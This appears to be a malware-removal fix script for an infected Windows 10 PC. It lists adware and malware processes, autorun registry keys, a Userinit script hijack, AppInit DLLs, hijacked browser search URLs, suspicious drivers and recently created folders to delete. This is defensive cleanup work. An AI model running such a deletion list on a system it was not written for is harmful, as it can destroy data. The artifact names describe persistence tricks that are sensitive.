cjoint


Document format: text/plain

Preview

start
CloseProcesses:
Hosts:
CreateRestorePoint:
C:\ProgramData\NetworkPacketManitor\Nettrans.exe
C:\ProgramData\Voyasollam\Voyasollam.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe
(E76YALI) C:\Users\shagu\AppData\Local\Temp\4Al4PnQuYPrUqr3FFgkc.exe
(E76YALI) C:\Program Files (x86)\gamesdesktop\DVWUF19X4UB11HX.exe
(E76YALI) C:\Users\shagu\AppData\Local\Temp\y0srZX2r7Mrm7n42SUjN.exe
() C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe
() C:\Users\shagu\AppData\Roaming\cacaoweb\cacaoweb.exe
(HhhooooooooooooooooooooOO) C:\Program Files\UD8MVCJA6E\72F13CPB5.exe
(HhhooooooooooooooooooooOO) C:\Program Files\K08FHE8WEZ\CIK6GFBB3.exe
(HhhooooooooooooooooooooOO) C:\Program Files\9D59N2UARQ\9D59N2UAR.exe
(HhhooooooooooooooooooooOO) C:\Program Files\XCRBBFIWT2\XCRBBFIWT.exe
(HhhooooooooooooooooooooOO) C:\Program Files\HBJ150IA9E\U0PGD0OB8.exe
(HhhooooooooooooooooooooOO) C:\Program Files\YIC00DDH83\YIC00DDH8.exe
(HhhooooooooooooooooooooOO) C:\Program Files\MGH6ES4EMS\MGH6ES4EM.exe
(HhhooooooooooooooooooooOO) C:\Program Files\HR1EISSO8I\UG8TQSYP7.exe
(HhhooooooooooooooooooooOO) C:\Program Files\G6QYP4DSM6\G6QYP4DSM.exe
(HhhooooooooooooooooooooOO) C:\Program Files\7TQYK9F2L3\3CP63ST4A.exe
(HhhooooooooooooooooooooOO) C:\Program Files\2QOHOPBI8A\FFVWWPHJ8.exe
(HhhooooooooooooooooooooOO) C:\Program Files\96S92P6X1T\96S92P6X1.exe
(HhhooooooooooooooooooooOO) C:\Program Files\2DLEWYFEH1\2DLEWYFEH.exe
(HhhooooooooooooooooooooOO) C:\Program Files\BNEY0VW1JX\BNEY0VW1J.exe
(HhhooooooooooooooooooooOO) C:\Program Files\HAHXFC6EP5\HAHXFC6EP.exe
(HhhooooooooooooooooooooOO) C:\Program Files\45GFA6D3KF\UJT9Q5P5J.exe
(HhhooooooooooooooooooooOO) C:\Program Files\NMOSU88QUN\NMOSU88QU.exe
(HhhooooooooooooooooooooOO) C:\Program Files\CL2Z8BKRBL\CL2Z8BKRB.exe
(HhhooooooooooooooooooooOO) C:\Program Files\MZTH9TTY69\MZTH9TTY6.exe
(HhhooooooooooooooooooooOO) C:\Program Files\EUHYMT8JEG\EUHYMT8JE.exe
(HhhooooooooooooooooooooOO) C:\Program Files\UY9ZFDD2Q8\UY9ZFDD2Q.exe
(HhhooooooooooooooooooooOO) C:\Program Files\N1HC2YI2Q6\DFV6IXU4O.exe
(HhhooooooooooooooooooooOO) C:\Program Files\148NE6VHDY\LW3OM9X26.exe
(HhhooooooooooooooooooooOO) C:\Program Files\ZIXN54QL90\ZIXN54QL9.exe
(HhhooooooooooooooooooooOO) C:\Program Files\O2R7XAAT8Q\8UM85DCE2.exe
(HhhooooooooooooooooooooOO) C:\Program Files\W39G0ASHJ1\GV4H8CV2C.exe
(HhhooooooooooooooooooooOO) C:\Program Files\6AHBOB74A5\0OZIGFXM5.exe
(HhhooooooooooooooooooooOO) C:\Program Files\3H3Q4COCAM\3H3Q4COCA.exe
(HhhooooooooooooooooooooOO) C:\Program Files\EFNNQ7IA4E\EFNNQ7IA4.exe
(Byte Technologies LLC) C:\Program Files\ByteFence\ByteFence.exe
(The Chromium Authors) C:\Users\shagu\AppData\Local\chromium\Application\chrome.exe
(HhhooooooooooooooooooooOO) C:\Program Files\IKV6HT8JBY\JNMPC1KAR.exe
(HhhooooooooooooooooooooOO) C:\Program Files\G8QTO7W9PW\G8QTO7W9P.exe
(HhhooooooooooooooooooooOO) C:\Program Files\Z0T35S67R9\Z0T35S67R.exe
(HhhooooooooooooooooooooOO) C:\Program Files\73107794SP\73107794S.exe
() C:\Program Files (x86)\VTech\DownloadManager\System\AgentMonitor.exe
HKLM\...\Run: [gplyra] => C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe [1570304 2017-02-15] () <===== ATTENTION
C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe
HKLM\...\RunOnce: [OMEWPRODUCT_P85C2] => C:\Users\shagu\AppData\Local\Temp\4Al4PnQuYPrUqr3FFgkc.exe [65536 2017-02-20] (E76YALI) <===== ATTENTION
HKLM\...\RunOnce: [OTUTPRODUCT_6VSZ1] => C:\Program Files (x86)\gamesdesktop\DVWUF19X4UB11HX.exe [64512 2017-02-20] (E76YALI) <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_03YSA] => C:\Users\shagu\AppData\Local\Temp\y0srZX2r7Mrm7n42SUjN.exe [65536 2017-02-20] (E76YALI) <===== ATTENTION
HKLM\...\Winlogon: [Userinit] wscript C:\WINDOWS\run.vbs,
HKLM-x32\...\Winlogon: [Userinit] wscript C:\WINDOWS\run.vbs,

HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [vbcNbeg0Sm] => C:\Program Files\UD8MVCJA6E\72F13CPB5.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [10S41wBbCk] => C:\Program Files\K08FHE8WEZ\CIK6GFBB3.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [zFBS5cYeyn] => C:\Program Files\9D59N2UARQ\9D59N2UAR.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [jbGxsjN3SB] => C:\Program Files\XCRBBFIWT2\XCRBBFIWT.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [z6pKLjhQXS] => C:\Program Files\HBJ150IA9E\U0PGD0OB8.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [Jh6NMovUhE] => C:\Program Files\YIC00DDH83\YIC00DDH8.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [SuperEx] => C:\WINDOWS\SuperEx\SuperEx\SuperEx.exe [31232 2017-02-06] ()
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [NJ7yTDdiis] => C:\Program Files\MGH6ES4EMS\MGH6ES4EM.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [CISnLD1WDc] => C:\Program Files\HR1EISSO8I\UG8TQSYP7.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [NmzCoKwHlZ] => C:\Program Files\G6QYP4DSM6\G6QYP4DSM.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [yGAXNASFzJ] => C:\Program Files\7TQYK9F2L3\3CP63ST4A.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [MDX0jHCpgL] => C:\Program Files\2QOHOPBI8A\FFVWWPHJ8.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [14yIxU6ZYc] => C:\Program Files\96S92P6X1T\96S92P6X1.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [pDDipqKIqI] => C:\Program Files\2DLEWYFEH1\2DLEWYFEH.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [S9u7W9EUSV] => C:\Program Files\BNEY0VW1JX\BNEY0VW1J.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [yUmAdZsXww] => C:\Program Files\HAHXFC6EP5\HAHXFC6EP.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [HYS4IOVKhj] => C:\Program Files\45GFA6D3KF\UJT9Q5P5J.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [ffGGtAwKQq] => C:\Program Files\NMOSU88QUN\NMOSU88QU.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [2wLeNYFha4] => C:\Program Files\CL2Z8BKRBL\CL2Z8BKRB.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [e9tfP94RW6] => C:\Program Files\MZTH9TTY69\MZTH9TTY6.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [s2SWcM7fEQ] => C:\Program Files\EUHYMT8JEG\EUHYMT8JE.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [F5V77GyE2i] => C:\Program Files\UY9ZFDD2Q8\UY9ZFDD2Q.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [dTkHqgTlg1] => C:\Program Files\N1HC2YI2Q6\DFV6IXU4O.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [McQBzlVOQq] => C:\Program Files\148NE6VHDY\LW3OM9X26.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [6S238jJqDc] => C:\Program Files\ZIXN54QL90\ZIXN54QL9.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [5L0ac3B513] => C:\Program Files\O2R7XAAT8Q\8UM85DCE2.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [rCwgoPGHnh] => C:\Program Files\W39G0ASHJ1\GV4H8CV2C.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [bv3UB0CQ22] => C:\Program Files\6AHBOB74A5\0OZIGFXM5.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [kTOBG3YOIr] => C:\Program Files\3H3Q4COCAM\3H3Q4COCA.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [4pgFoiOgSX] => C:\Program Files\EFNNQ7IA4E\EFNNQ7IA4.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [0aPTB1mht8] => C:\Program Files\IKV6HT8JBY\JNMPC1KAR.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [8MS98DOnSt] => C:\Program Files\G8QTO7W9PW\G8QTO7W9P.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [i8l0YonkVV] => C:\Program Files\Z0T35S67R9\Z0T35S67R.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [oDTQAGl6jI] => C:\Program Files\73107794SP\73107794S.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
AppInit_DLLs: C:\ProgramData\Voyasollam\Bamstock.dll => C:\ProgramData\Voyasollam\Bamstock.dll [358912 2017-02-20] ()
AppInit_DLLs-x32: C:\ProgramData\Voyasollam\Hotnix.dll => C:\ProgramData\Voyasollam\Hotnix.dll [248320 2017-02-20] ()
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\¿ìѹ\X64\KZipShell.dll [2017-02-20] ()
BootExecute: autocheck autochk * ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????þ??????????ÿ??????????????????
GroupPolicy: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB36XWMy9a0VnLziUhrYEowxR-PbiLYmqBYHrYNX3Lc5VWOPmTxuFoWoz2zhnzfN1mFLqdjtKnE7MXG1nMMiGXCoiE5wvrPd7jYDsZuKjguQQw2NrQ8ZrDNWf4KUnqZ8-C3WcSJjd1S1ZROYgGAq-LWqPEDADzw,,&q={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBtAzyyByEtAtD0DtGyDtD0B0FtGyCyDtDyEtGtC0F0FtAtG0Czz0AyEtA0CyD0B0B0DtAyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1306435427%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1826273261-1479682476-3830217024-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1826273261-1479682476-3830217024-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1826273261-1479682476-3830217024-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB36XWMy9a0VnLziUhrYEowxR-PbiLYmqBYHrYNX3Lc5VWOPmTxuFoWoz2zhnzfN1mFLqdjtKnE7MXG1nMMiGXCoiE5wvrPd7jYDsZuKjguQQw2NrQ8ZrDNWf4KUnqZ8-C3WcSJjd1S1ZROYgGAq-LWqPEDADzw,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1826273261-1479682476-3830217024-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB36XWMy9a0VnLziUhrYEowxR-PbiLYmqBYHrYNX3Lc5VWOPmTxuFoWoz2zhnzfN1mFLqdjtKnE7MXG1nMMiGXCoiE5wvrPd7jYDsZuKjguQQw2NrQ8ZrDNWf4KUnqZ8-C3WcSJjd1S1ZROYgGAq-LWqPEDADzw,,&q={searchTerms}
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2017-02-20] ()
R2 OtherSearch; C:\Program Files (x86)\y1V1qSd0Rl\kl.dll [829440 2017-02-18] () [Fichier non signé] <==== ATTENTION
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [8061808 2017-01-19] (Reimage®)
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3110400 2017-02-20] (Search Module Ltd.) [Fichier non signé] <==== ATTENTION
R2 Voyasollam; C:\ProgramData\\Voyasollam\\Voyasollam.exe [982016 2017-02-20] () [Fichier non signé]
R1 7ad9afa1fb34e2ffbfe2d9be24eea4c0; C:\WINDOWS\system32\drivers\7ad9afa1fb34e2ffbfe2d9be24eea4c0.sys [96272 2017-02-17] (YHR5LV) <==== ATTENTION
R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
S1 clznlfdt; \??\C:\WINDOWS\system32\drivers\clznlfdt.sys [X]
2017-02-20 05:39 - 2017-02-20 06:50 - 00001010 _____ C:\WINDOWS\Tasks\Yahoo! Powered latom.job
2017-02-20 05:39 - 2017-02-20 05:48 - 00004088 _____ C:\WINDOWS\System32\Tasks\Yahoo! Powered latom
2017-02-20 05:25 - 2017-02-20 05:27 - 00000000 ____D C:\ProgramData\Reimage Protector
2017-02-20 05:25 - 2017-02-20 05:26 - 00000000 ____D C:\Program Files\Reimage
2017-02-20 05:25 - 2017-02-20 05:25 - 00001988 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2017-02-20 05:25 - 2017-02-20 05:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2017-02-20 05:23 - 2017-02-20 05:28 - 00000140 _____ C:\WINDOWS\Reimage.ini
2017-02-20 05:23 - 2017-02-20 05:23 - 00604928 _____ (Reimage) C:\Users\shagu\Downloads\ReimageRepair.exe
2017-02-20 04:09 - 2017-02-20 04:09 - 00000000 ____D C:\Program Files\3H3Q4COCAM
2017-02-20 04:07 - 2017-02-20 07:32 - 00000000 ____D C:\Program Files (x86)\y1V1qSd0Rl
2017-02-20 04:06 - 2017-02-20 04:06 - 00000000 ____D C:\Program Files\W39G0ASHJ1
2017-02-20 04:06 - 2017-02-20 04:06 - 00000000 ____D C:\Program Files\6AHBOB74A5
2017-02-20 03:47 - 2017-02-20 03:47 - 00000000 ____D C:\Program Files\ZIXN54QL90
2017-02-20 03:47 - 2017-02-20 03:47 - 00000000 ____D C:\Program Files\O2R7XAAT8Q
2017-02-20 03:44 - 2017-02-20 03:44 - 00000000 ____D C:\Program Files\N1HC2YI2Q6
2017-02-20 03:44 - 2017-02-20 03:44 - 00000000 ____D C:\Program Files\148NE6VHDY
2017-02-20 03:42 - 2017-02-20 03:42 - 00000000 ____D C:\Program Files\UY9ZFDD2Q8
2017-02-20 03:41 - 2017-02-20 03:41 - 00000000 ____D C:\Program Files\EUHYMT8JEG
2017-02-20 03:38 - 2017-02-20 03:38 - 00000000 ____D C:\Program Files\MZTH9TTY69
2017-02-20 03:29 - 2017-02-20 03:29 - 00000000 ____D C:\Program Files\NMOSU88QUN
2017-02-20 03:29 - 2017-02-20 03:29 - 00000000 ____D C:\Program Files\CL2Z8BKRBL
2017-02-20 03:09 - 2017-02-20 03:09 - 00000000 ____D C:\Program Files\BNEY0VW1JX
2017-02-20 03:08 - 2017-02-20 03:08 - 00000000 ____D C:\Program Files\2DLEWYFEH1
2017-02-20 03:07 - 2017-02-20 03:07 - 00000000 ____D C:\Program Files\96S92P6X1T
2017-02-20 03:06 - 2017-02-20 03:07 - 00000000 ____D C:\Program Files\2QOHOPBI8A
2017-02-20 03:04 - 2017-02-20 07:32 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-02-20 03:04 - 2017-02-20 03:05 - 00000000 ____D C:\Users\shagu\AppData\Roaming\gplyra
2017-02-20 03:04 - 2017-02-20 03:04 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-02-20 03:04 - 2017-02-20 03:04 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2017-02-20 03:04 - 2017-02-20 03:04 - 00000000 ____D C:\Program Files\G6QYP4DSM6
2017-02-20 03:04 - 2017-02-20 03:04 - 00000000 ____D C:\Program Files\7TQYK9F2L3
2017-02-20 02:42 - 2017-02-20 06:50 - 00000324 _____ C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job
2017-02-20 02:42 - 2017-02-20 05:28 - 00002678 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdaterCore
2017-02-20 02:42 - 2017-02-20 03:55 - 00000488 _____ C:\WINDOWS\Tasks\UCBrowserUpdater.job
2017-02-20 02:42 - 2017-02-20 02:42 - 00003506 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater
2017-02-20 02:42 - 2017-02-20 02:42 - 00003476 _____ C:\WINDOWS\System32\Tasks\UCBrowserSecureUpdater
2017-02-20 02:41 - 2017-02-20 02:41 - 00000000 ____D C:\Users\shagu\AppData\Local\UCBrowser
